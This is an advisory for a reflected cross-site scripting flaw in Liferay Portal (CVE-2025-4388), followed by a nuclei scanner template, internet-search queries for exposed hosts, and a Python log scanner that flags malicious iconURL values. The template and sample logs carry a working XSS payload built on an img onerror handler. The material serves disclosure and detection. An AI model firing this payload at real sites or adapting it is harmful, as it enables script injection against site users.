A reflected cross-site scripting (XSS) vulnerability in Liferay Portal 7.4.0 through 7.4.3.131, and Liferay DXP 2024.Q4.0 through 2024.Q4.5, 2024.Q3.1 through 2024.Q3.13, 2024.Q2.0 through 2024.Q2.13, 2024.Q1.1 through 2024.Q1.12, and 7.4 GA through update 92 allows a remote unauthenticated attacker to inject JavaScript into the modules/apps/marketplace/marketplace-app-manager-web module.
PoC code [publicly disclosed]
id: CVE-2025-4388

info:
  name: Liferay Portal - Cross-Site Scripting
  author: iamnoooob,rootxharsh,pdresearch
  severity: medium
  description: |
    A reflected cross-site scripting (XSS) vulnerability in Liferay Portal 7.4.0 through 7.4.3.131, and Liferay DXP 2024.Q4.0 through 2024.Q4.5, 2024.Q3.1 through 2024.Q3.13, 2024.Q2.0 through 2024.Q2.13, 2024.Q1.1 through 2024.Q1.12, and 7.4 GA through update 92 allows a remote unauthenticated attacker to inject JavaScript into the modules/apps/marketplace/marketplace-app-manager-web module.
  reference:
    - https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-4388
    - https://nvd.nist.gov/vuln/detail/CVE-2025-4388
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 6.5
    cve-id: CVE-2025-4388
    cwe-id: CWE-79
    epss-score: 0.06844
    epss-percentile: 0.90992
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"liferayPortalCSS"
    fofa-query: body="liferayPortalCSS"
  tags: cve,cve2025,liferay,marketplace,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/o/marketplace-app-manager-web/icon.jsp?iconURL=https:///%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'sticker sticker-'
          - '<img src=x onerror=alert(document.domain)>'
        condition: and

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a00463044022062fe113c4cb34e63e68177c3832b79769a4b8cfede478a44835101eebdf07bdb02201cc5b767213c5d022b4f305743a333b06c6ed0be07ec87613bda15dd8259e1af:922c64590222798bb761d5b6d8e72950
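As an added detection-side example (not part of the advisory or the nuclei template), the script below scans web-server access logs for requests to the icon.jsp endpoint named above whose iconURL parameter carries HTML attribute-breakout characters or an inline event handler, which is what this reflected XSS relies on. The log lines are constructed samples in common log format, and the endpoint path and parameter name are taken from the template.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (common log format); not from the page.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jun/2025:12:00:01 +0000] "GET /o/marketplace-app-manager-web/icon.jsp?iconURL=https://cdn.example/app.png HTTP/1.1" 200 512
10.0.0.9 - - [01/Jun/2025:12:00:02 +0000] "GET /o/marketplace-app-manager-web/icon.jsp?iconURL=https:///%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1" 200 1024
10.0.0.7 - - [01/Jun/2025:12:00:03 +0000] "GET /web/guest/home HTTP/1.1" 200 4096
"""

# Endpoint and parameter named in the advisory / template.
ICON_PATH = "/o/marketplace-app-manager-web/icon.jsp"
PARAM = "iconURL"

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Quote/angle-bracket breakout or an on*= handler never belongs in an icon URL.
SUSPICIOUS_RE = re.compile(r'[<>"\']|\bon\w+\s*=', re.IGNORECASE)


def is_suspicious_icon_url(value):
    """True if the (possibly still percent-encoded) iconURL value carries markup."""
    decoded = unquote(unquote(value))  # two passes also catch double-encoding
    return SUSPICIOUS_RE.search(decoded) is not None


def flag_requests(log_text):
    """Return one dict per icon.jsp request whose iconURL looks like markup."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group("target"))
        if target.path != ICON_PATH:
            continue
        # parse_qs percent-decodes once; is_suspicious_icon_url decodes again.
        for value in parse_qs(target.query).get(PARAM, []):
            if is_suspicious_icon_url(value):
                hits.append({"client": line.split(" ", 1)[0],
                             "iconURL": unquote(value)})
    return hits


if __name__ == "__main__":
    for hit in flag_requests(SAMPLE_LOG):
        print(f"{hit['client']} sent iconURL={hit['iconURL']!r}")
```

A hit is only a reflection attempt; whether it succeeded depends on the response, so correlate with the patch level in the advisory before treating it as a compromise.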